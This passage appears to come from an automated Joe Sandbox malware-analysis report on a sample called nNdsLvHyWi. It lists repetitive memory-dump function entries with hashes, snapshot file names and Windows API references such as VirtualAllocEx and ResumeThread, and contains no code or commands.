                                          • Opcode ID: 5ce4e7712ed4d3543ac4d5eda932d9082007dc0417f70403c336fdb0b79bd08b
                                          • Instruction ID: 0821bf3eacfc6297bce6bb9707bffa60619f494bc2c414d5fc60c4755e33375b
                                          • Opcode Fuzzy Hash: 5ce4e7712ed4d3543ac4d5eda932d9082007dc0417f70403c336fdb0b79bd08b
                                          • Instruction Fuzzy Hash: CE1117B6D043498FDB10CF9AD544B9EFBF4EB88720F10842AE915A7210C3B5A545CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CD5566
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: fcd88a9a5534d4246d188539e2ec9f7ed756d5f7712f674187249dca81db2150
                                          • Instruction ID: 20a12449909f3e479a8532c328a5aa14fc7a1bfb9154c2cf8cf7967b8c213fda
                                          • Opcode Fuzzy Hash: fcd88a9a5534d4246d188539e2ec9f7ed756d5f7712f674187249dca81db2150
                                          • Instruction Fuzzy Hash: BB1126729002499FDF10DFAAC845BDFBFF5AF88720F148419E619A7250CB75A550CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CD5566
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: a8105f92e2675a8489ddf14db3ccf1ea9cf91331ea224a769f54893a17482962
                                          • Instruction ID: e9c2970295a97a35e1e0986e1ca41dd868734ee34a7dc96921afbf3226c6a1e8
                                          • Opcode Fuzzy Hash: a8105f92e2675a8489ddf14db3ccf1ea9cf91331ea224a769f54893a17482962
                                          • Instruction Fuzzy Hash: 741126729002499FDF10DFAAC845BDEBBF5AF88720F148419E619A7250C775A550CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 360ee80e3868f2e5522f9c81ef5df33a36559ac6a6e5518cc12f519423832b90
                                          • Instruction ID: 696bf235e92f405fbc0df9379bc6fa0211805b3e3a2fac96c35ef9ed88aa7be2
                                          • Opcode Fuzzy Hash: 360ee80e3868f2e5522f9c81ef5df33a36559ac6a6e5518cc12f519423832b90
                                          • Instruction Fuzzy Hash: 741158B19003498FDB24DFAAC8457EEFBF5EF88724F248419D519A7250CB75A904CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: c6162582ba75ebbb23c65a5a5598634e16d621605949b9db4267104a7355122e
                                          • Instruction ID: f0932282791cf981e681abba1b6c50f816f89c0fe2542798549456458c71d46a
                                          • Opcode Fuzzy Hash: c6162582ba75ebbb23c65a5a5598634e16d621605949b9db4267104a7355122e
                                          • Instruction Fuzzy Hash: C2113AB1D003498FDB14DFAAC84579EFBF5EF88724F248419D519A7250CB75A540CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CD95DD
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: ac067eb50c7f28df5e85b2606f76b0ccfdb2e28391cd13a5b3ce4393f967dae7
                                          • Instruction ID: ff9c69c9613d141e7fc38f0355bcf1fcd2f14122ab721384df9b68b9533fb637
                                          • Opcode Fuzzy Hash: ac067eb50c7f28df5e85b2606f76b0ccfdb2e28391cd13a5b3ce4393f967dae7
                                          • Instruction Fuzzy Hash: 481106B98003499FDB50CF99D885BDFBBF8FB48320F108459E915A7210D775A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CD95DD
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 92dbf87dce0ac107df369b1fed0e3350ebdb06cafa999f574fa52c655320afea
                                          • Instruction ID: b26902a384374f46bd69f212fbb4563d35fd6f3c512eb449ac3f8fca927d4584
                                          • Opcode Fuzzy Hash: 92dbf87dce0ac107df369b1fed0e3350ebdb06cafa999f574fa52c655320afea
                                          • Instruction Fuzzy Hash: 0E11F2B58003499FDB50DF9AC885BDEFBF8EB48320F108559E918A7210D3B5AA44CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9AFBE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 7f9150615c7553830b5f59aa166e9c74e4df5c342aee7d69b4b31de193f17995
                                          • Instruction ID: 3ffa377e42061d96ef9680c2179d50570ffc68cb099cd5a9c466680f991ecb53
                                          • Opcode Fuzzy Hash: 7f9150615c7553830b5f59aa166e9c74e4df5c342aee7d69b4b31de193f17995
                                          • Instruction Fuzzy Hash: 0F11E0B6C007498FDB10CF9AD444BDEFBF4AF88328F10845AD829A7610D3B9A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f78d5f3c4e737e230721657f336c78e38cdaeb50d59344ab6df609e2875b9de
                                          • Instruction ID: 85846915f652a6c169ef888d96b71ab5d0b6d160ebc8f8ab6e26a2705bdca6f4
                                          • Opcode Fuzzy Hash: 1f78d5f3c4e737e230721657f336c78e38cdaeb50d59344ab6df609e2875b9de
                                          • Instruction Fuzzy Hash: B37119B5E002489FDB08DFAAD855BDDBBB2FB89300F108129E509BB398DB345945CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c9b14f97658c5f7bc681e2443bf123bc40fa6e6be382b8dabb06fa4997c3a26
                                          • Instruction ID: 98150ca368c33dc269f00bfadb09b0115f27d5772eb194d0787d8d463c9af4e7
                                          • Opcode Fuzzy Hash: 3c9b14f97658c5f7bc681e2443bf123bc40fa6e6be382b8dabb06fa4997c3a26
                                          • Instruction Fuzzy Hash: 878190B4E00218DFDB64DFA4D955B9DBBB2FB89300F1080A9E909A7355DB349E82CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47c82590e43193669f2f3b6221ef4558843a54855fb2e7ba399b3b62f892587e
                                          • Instruction ID: 9a49b2a0d37a59d8742bc22b89f5f0a5b4c6bbe8d430e59af1f19e862d96d74b
                                          • Opcode Fuzzy Hash: 47c82590e43193669f2f3b6221ef4558843a54855fb2e7ba399b3b62f892587e
                                          • Instruction Fuzzy Hash: 1451E6B5E0021D9FDB04DFE9D444AEEBBB6FF89301F108029E915AB254D7745A46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57805304f73a64d1570c681cd9038047fbd76fb2b53a3cd84e2c7d78a91784dd
                                          • Instruction ID: d71b7c56b0069e32e5d9d6cd492014622c7a06b93f6cc24fd99f40e08cd0017a
                                          • Opcode Fuzzy Hash: 57805304f73a64d1570c681cd9038047fbd76fb2b53a3cd84e2c7d78a91784dd
                                          • Instruction Fuzzy Hash: B841F174E112189FDB00DFA8D884AEEBBB2FB4C320F149555E800B7355D775A995CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2862f311cbd1cd425c83ea122c2a08d3597b9c060190b2216fb6968f56fd8256
                                          • Instruction ID: d8841b65998e4df802220c32a114d5fc997b92261b1d6aa3d306c1c81a0323e1
                                          • Opcode Fuzzy Hash: 2862f311cbd1cd425c83ea122c2a08d3597b9c060190b2216fb6968f56fd8256
                                          • Instruction Fuzzy Hash: 6541F5B4D05228DFEBA0CF24EC98B99BBB1BB49305F0060E9E50DAB251D7B45AC4CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25942524c36a990246f544eaec64b1e50599b46f3099543f67ad1c91c0e10d33
                                          • Instruction ID: 7ebc29e24fd1d5244ad856c6266e2deabbb4ae0a94b3ea21b76c295988d00b7e
                                          • Opcode Fuzzy Hash: 25942524c36a990246f544eaec64b1e50599b46f3099543f67ad1c91c0e10d33
                                          • Instruction Fuzzy Hash: B9312A70E00208DFDB44DFA9D544AEEBBB2FF88310F14816AD815AB354DB759981CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145335664.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a1d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3665d9dd0a8051ec7c65890e032436be992e8b603b9c939dcb97075d8dfc88f8
                                          • Instruction ID: 77d12ff34c6c7dd32b3f209deaf25af237cc80ce658c1f239972d0025b007405
                                          • Opcode Fuzzy Hash: 3665d9dd0a8051ec7c65890e032436be992e8b603b9c939dcb97075d8dfc88f8
                                          • Instruction Fuzzy Hash: A7212876504204EFDB04DF14D9C0B66BF65FB98324F24C56DE90A0F256C336E896CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 955a31aa49e83ccb8e71b507bf15e2eca118b7e321dc72f1dca95c829bb2fa79
                                          • Instruction ID: 859ac5e5ca56d728fdaf07594929b5ebb238544077fcff955b9364f03d1f97fe
                                          • Opcode Fuzzy Hash: 955a31aa49e83ccb8e71b507bf15e2eca118b7e321dc72f1dca95c829bb2fa79
                                          • Instruction Fuzzy Hash: 0B3102B5E00209EFDB04DFA9E5446EEBBF1EB8D300F10806AD405B7294EB785A55CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 735aa389fb48b62ba47690967615e33bd54b34fcf01a518f0d75a2b88f9deb0d
                                          • Instruction ID: 1d808f101a40aedcd851f3f44a33c97354bff25fab7d48e010d5d32838aa20a4
                                          • Opcode Fuzzy Hash: 735aa389fb48b62ba47690967615e33bd54b34fcf01a518f0d75a2b88f9deb0d
                                          • Instruction Fuzzy Hash: 0D3116B4E0020DEFDB44DFA9D5456AEBBB2FF88300F108129D416AB355DB785A41CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145412197.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a2d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0c5aab239f327050291b02a3a1a78b2a6bf72aca006b19eaa1167752dc6a152
                                          • Instruction ID: dffab630585eae20a1a5a1e0792c3fc242573c1b01a05503ac1fa886014d4b82
                                          • Opcode Fuzzy Hash: e0c5aab239f327050291b02a3a1a78b2a6bf72aca006b19eaa1167752dc6a152
                                          • Instruction Fuzzy Hash: E721D075604204EFDB04DF18E9C0B26BBA5FB88714F24C57DD94A4F253C77AD846CA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145412197.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a2d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 541df1278389d9e59b381d7637a0e06be523f0949bf90f660b92aad467aefab2
                                          • Instruction ID: f7d0a9eeff6e25d30d01c7d185380ed8c04331ab108225aba624dc94d529cc05
                                          • Opcode Fuzzy Hash: 541df1278389d9e59b381d7637a0e06be523f0949bf90f660b92aad467aefab2
                                          • Instruction Fuzzy Hash: 49213475504304EFDB04DF18E9C0B26BB61FB84314F20C67DD90A4B697C77AD866CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f555d7877f37be9b4edeca321849f459594cbf0dd85643f6263cfabdeb2c9ca
                                          • Instruction ID: 50496bae8c635f4823a1e6dda82b7888494ba422b82c611988f84724a1c4da8b
                                          • Opcode Fuzzy Hash: 9f555d7877f37be9b4edeca321849f459594cbf0dd85643f6263cfabdeb2c9ca
                                          • Instruction Fuzzy Hash: BD211DB4D0420DEFDB44DFA9E0456AEBBB2BB88300F14C16AD418AB254D7B99981CFD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1254c15921dcb28c5d8b79be75ce8f5961d5e91619ed3a4534e80c2862a9a39
                                          • Instruction ID: 9f0d5648a9ba441e13ccf034ce9131351db7842d9a68627ba7138870e72d450d
                                          • Opcode Fuzzy Hash: a1254c15921dcb28c5d8b79be75ce8f5961d5e91619ed3a4534e80c2862a9a39
                                          • Instruction Fuzzy Hash: 19219E74A01908EFC748DF5AE688999BBF1FF8C310B6280D4D448AB335DB35AE10DB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145335664.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a1d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction ID: c7d1e042e7365ae2975904d22aadd5ca6ca378e8f8f403e5ef76ed65d666afd5
                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction Fuzzy Hash: 3C11E6B6504280DFCB15CF10D5C4B56BF72FB94324F24C6A9D8490B656C33AE896CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2145412197.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_a2d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction ID: 8cadc733ba8015d225ee3f29ef36ae5ffc349b270d141fb13fae8291f7d5f677
                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction Fuzzy Hash: 15118B7A504284DFCB05CF14E5C4B19BFA1FB84314F24C6A9D8494F657C33AD84ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56f0047de00f937088af9a61c30689df4e8797a01475a8f927e08470a1771789
                                          • Instruction ID: 66d9df9361409cd87f2bf160fbe3e15c2821a2b6d3d3c03f3c2a4c7198342f33
                                          • Opcode Fuzzy Hash: 56f0047de00f937088af9a61c30689df4e8797a01475a8f927e08470a1771789
                                          • Instruction Fuzzy Hash: 3A01D2B5D09208AFDB44EFA5F8056BDBBB9FBC9300F00D155D8089B310DBB84A41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae638c767f515a9c9a35b9ecb7348fb309351e8ab3d33bfb05fcbf21c235698f
                                          • Instruction ID: a38aba053d64789712c2a75d5b9f86c7e616b8925e00ed8f4d6e5fccb031d311
                                          • Opcode Fuzzy Hash: ae638c767f515a9c9a35b9ecb7348fb309351e8ab3d33bfb05fcbf21c235698f
                                          • Instruction Fuzzy Hash: 1D1192B4D04208EFDB44EFA9E4456ADBFF5FB89300F10C5AAD85497345E7B85A42CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0a280ba72194bd2b77da0a3c34689025afe0b5ecd9fbd56ab77ee8145a85a04c
                                          • Instruction ID: 484477ca7e3dc82eea91b35c3a08b481ac010ce57ff33c42a5b211228d7c3212
                                          • Opcode Fuzzy Hash: 0a280ba72194bd2b77da0a3c34689025afe0b5ecd9fbd56ab77ee8145a85a04c
                                          • Instruction Fuzzy Hash: B0115BB4D08209DFDB84CFA9A4452AEBFF1AB89300F1481AAC408AB211D7754A45CFD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0230ab68a64246cb24286274e2f586a46a65f1230068b2935e810eb4ed6fd404
                                          • Instruction ID: 2f8f50c12c2eda746400b980a5f1a5a8abb7a27e969d52755aff089ddfbc89ec
                                          • Opcode Fuzzy Hash: 0230ab68a64246cb24286274e2f586a46a65f1230068b2935e810eb4ed6fd404
                                          • Instruction Fuzzy Hash: 6B11C274911508EFCB40DFA9F189998BBF0FF48310F5281D4D884AB325DB349AA0CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a4877df400b7f7875dd2f73c687e3d8dc59bdf7a60478535f1b9442adf0a184
                                          • Instruction ID: 5c2ed0e18b4620bbbfd0ba06e3fa07a4d49f8a110e339200e89a41cb4466c90f
                                          • Opcode Fuzzy Hash: 3a4877df400b7f7875dd2f73c687e3d8dc59bdf7a60478535f1b9442adf0a184
                                          • Instruction Fuzzy Hash: F6018FB4D00208EFCB44EFAAE5046AEBBF5FBC8300F10C565D81897304D7B85A41CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256917714be7b8c19f80fe339f643474997bdb5129f44a07069ca38e34e3d69a
                                          • Instruction ID: 9e2097ce01800f099a47cfee344df6f7e615a77c56b66dbb91f572d49191c66e
                                          • Opcode Fuzzy Hash: 256917714be7b8c19f80fe339f643474997bdb5129f44a07069ca38e34e3d69a
                                          • Instruction Fuzzy Hash: 14F0A07141D388AFD7068BB0AC266A93FF8EB0B101B1142D7D148CB162EA74491AC753
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 685701061b2c32ed41197300e501fd04c1ab6014de6f840112abe097ddff1bb8
                                          • Instruction ID: 21879808a04c4ba9639762cc0abbc5d612ccf5a9b99b1877fe850f5a545f473a
                                          • Opcode Fuzzy Hash: 685701061b2c32ed41197300e501fd04c1ab6014de6f840112abe097ddff1bb8
                                          • Instruction Fuzzy Hash: ABF01DB4D0420CEFDB84DFE9E4456AEBBB4FB49700F0095AAD818A7300E7745A44CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: daacc27a00b95fd7a47984787fa26a3276264acc1ef994bae8a6e6084c6476fe
                                          • Instruction ID: a18ce534d9404f7c1ffdb30e71543fa43a459a0ca060183d5d211eed17b0e6af
                                          • Opcode Fuzzy Hash: daacc27a00b95fd7a47984787fa26a3276264acc1ef994bae8a6e6084c6476fe
                                          • Instruction Fuzzy Hash: 4AF0A074D09248EFDB04EF70F8169EDBF78FB06200F01419AD8445B261CB705A46D7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 388de10d5e1e5eb3012c9ae4e55ee71346d2edeaf236e6bcc64cc99474f79fb2
                                          • Instruction ID: 5dd89ccbabc4bac796d954c79ef309d3f72e055641b2b760eb0b7aff93fdb9b7
                                          • Opcode Fuzzy Hash: 388de10d5e1e5eb3012c9ae4e55ee71346d2edeaf236e6bcc64cc99474f79fb2
                                          • Instruction Fuzzy Hash: 20F05EB4D08348AFD740DFA8E4512ACFBF4EB89210F2080AAC888D7252D6759A56CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f86daa22047d0051f49cc23f35790222927533a64fa6b3c7c97f056fe124763b
                                          • Instruction ID: a623accb5e47a5f8f9d01c4969d16e0a52e8b96a7bd09df6ab7ac3873c012f4f
                                          • Opcode Fuzzy Hash: f86daa22047d0051f49cc23f35790222927533a64fa6b3c7c97f056fe124763b
                                          • Instruction Fuzzy Hash: 24E09279A08248AFC754DBE4F456AACBBB4AB46304F1081DEC8441B252DA715F82C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
